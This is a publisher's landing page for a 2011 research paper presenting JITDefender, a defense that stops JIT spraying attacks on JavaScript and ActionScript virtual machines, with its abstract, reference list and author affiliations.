Advertisement

JITDefender: A Defense against JIT Spraying Attacks

  • Ping Chen
  • Yi Fang
  • Bing Mao
  • Li Xie
Part of the IFIP Advances in Information and Communication Technology book series (IFIPAICT, volume 354)

Abstract

JIT spraying is a new code-reuse technique to attack virtual machines based on JIT (Just-in-time) compilation. It has proven to be capable of circumventing the defenses such as data execution prevention (DEP) and address space layout randomization(ASLR), which are effective for preventing the traditional code injection attacks. In this paper, we describe JITDefender, an enhancement of standard JIT-based VMs, which can prevent the attacker from executing arbitrary JIT compiled code on the VM. Thereby JITDefender can block JIT spraying attacks. We prove the effectiveness of JITDefender by demonstrating that it can successfully prevent existing JIT spraying exploits. JITDefender reports no false positives when run over benign actionscript/javascript programs. In addition, we show that the performance overhead of JITDefender is low.

Keywords

Malicious Code Performance Overhead Native Code Code Snippet Code Execution 
These keywords were added by machine and not by the authors. This process is experimental and the keywords may be updated as the learning algorithm improves.

References

  1. 1.
    Google chrome 0.2.149.27 ’saveas’ function buffer overflow vulnerability, http://seclists.org/bugtraq/2008/Sep/70
  2. 2.
  3. 3.
  4. 4.
    The Webkit open source project, webkit.org/
  5. 5.
    x86 shellcode detection and emulation, http://libemu.mwcollect.org/
  6. 6.
    The Pax project (2004), http://pax.grsecurity.net/
  7. 7.
    Abadi, M., Budiu, M., Ligatti, J.: Control-flow integrity. In: Proceedings of the 12th ACM Conference on Computer and Communications Security (CCS), pp. 340–353. ACM, New York (2005)CrossRefGoogle Scholar
  8. 8.
    Bania, P.: JIT spraying and mitigations (2010), http://arxiv.org/abs/1009.1038
  9. 9.
    Bhatkar, E., Duvarney, D.C., Sekar, R.: Address obfuscation: an efficient approach to combat a broad range of memory error exploits. In: Proceedings of the 12th USENIX Security Symposium, pp. 105–120 (2003)Google Scholar
  10. 10.
    Blazakis, D.: Interpreter exploitation. In: Proceedings of tth USENIX Workshop on Offensive Technologies (WOOT 2010), pp. 1–9 (2010)Google Scholar
  11. 11.
    Kolbitsch, C., Holz, T., Kruegel, C., Kirda, E.: Inspector gadget: Automated extraction of proprietary gadgets from malware binaries. In: Proceedings of the 30th IEEE Symposium on Security and Privacy, pp 29–44 (2010)Google Scholar
  12. 12.
    Caballero, J., Johnson, N.M., McCamant, S., Song, D.: Binary code extraction and interface identification for security applications. In: Proceedings of the 17th Annual Network and Distributed System Security Symposium (2010)Google Scholar
  13. 13.
    Castro, M., Costa, M., Harris, T.: Securing software by enforcing data-flow integrity. In: Proceedings of the 7th USENIX Symposium on Operating Systems Design and Implementation, vol. 7, p. 11. USENIX Association, Berkeley (2006)Google Scholar
  14. 14.
    Egele, M., Wurzinger, P., Kruegel, C., Kirda, E.: Defending browsers against drive-by downloads: Mitigating heap-spraying code injection attacks. In: Flegel, U., Bruschi, D. (eds.) DIMVA 2009. LNCS, vol. 5587, pp. 88–106. Springer, Heidelberg (2009)CrossRefGoogle Scholar
  15. 15.
    Erlingsson, U., Valley, S., Abadi, M., Vrable, M., Budiu, M., Necula, G.C.: XFI: Software guards for system address spaces. In: Proceedings of the 7th USENIX Symposium on Operating Systems Design and Implementation, vol. 7, p. 6. USENIX Association, Berkeley (2006)Google Scholar
  16. 16.
    Gadaleta, F., Younan, Y., Joosen, W.: BuBBle: A javascript engine level countermeasure against heap-spraying attacks. In: Massacci, F., Wallach, D., Zannone, N. (eds.) ESSoS 2010. LNCS, vol. 5965, pp. 1–17. Springer, Heidelberg (2010)CrossRefGoogle Scholar
  17. 17.
    de Groef, W., Nikiforakis, N., Younan, Y., Piessens, F.: Jitsec: Just-in-time security for code injection attacks. In: Benelux Workshop on Information and System Security (WISSEC 2010), pp. 1–15 (2010)Google Scholar
  18. 18.
    Google Inc.: V8 javascript engine, code.google.com/apis/v8/intro.html
  19. 19.
    Payer, M.: I control your code attack vectors through the eyes of software-based fault isolation. In: 27C3 (2010)Google Scholar
  20. 20.
    Ratanaworabhan, P., Livshits, B., Zorn, B.: Nozzle: A defense against heap-spraying code injection attacks. In: Proceedings of 18th USENIX Security Symposium (2009)Google Scholar
  21. 21.
    Shacham, H.: The geometry of innocent flesh on the bone: return-into-libc without function calls (on the x86). In: Proceedings of the 14th ACM Conference on Computer and Communications Security (CCS), pp. 552–561. ACM, New York (2007)CrossRefGoogle Scholar
  22. 22.
    Sintsov, A.: JIT spraying attack on safari, http://www.exploit-db.com/exploits/12614/
  23. 23.
    Sintsov, A.: Oracle document capture (easymail objects emsmtp.dll 6.0.1) activex control bof - JIT-spray exploit, http://dsecrg.com/files/exploits/QuikSoft-reverse.zip
  24. 24.
    Sintsov, A.: SAP GUI 7.10 webviewer3d Activex - JIT-spray exploit, http://dsecrg.com/files/exploits/SAP-Logon7-System.zip
  25. 25.
  26. 26.
    Sintsov, A.: Writing JIT-spray shellcode for fun and profit. In: Technical Report of Digital Security (2010)Google Scholar
  27. 27.
    Tao, W., Tielei, W., Lei, D., Jing, L.: Secure dynamic code generation against spraying. In: CCS 2010 Poster, pp. 738–740. ACM, New York (2010)Google Scholar
  28. 28.
  29. 29.
    Wikipedia: Heap spraying (2010), http://en.wikipedia.org/wiki/Heap_spraying

Copyright information

© IFIP International Federation for Information Processing 2011

Authors and Affiliations

  • Ping Chen
    • 1
    • 2
  • Yi Fang
    • 1
    • 2
  • Bing Mao
    • 1
    • 2
  • Li Xie
    • 1
    • 2
  1. 1.State Key Laboratory for Novel Software TechnologyNanjing UniversityChina
  2. 2.Department of Computer Science and TechnologyNanjing UniversityNanjingChina

Personalised recommendations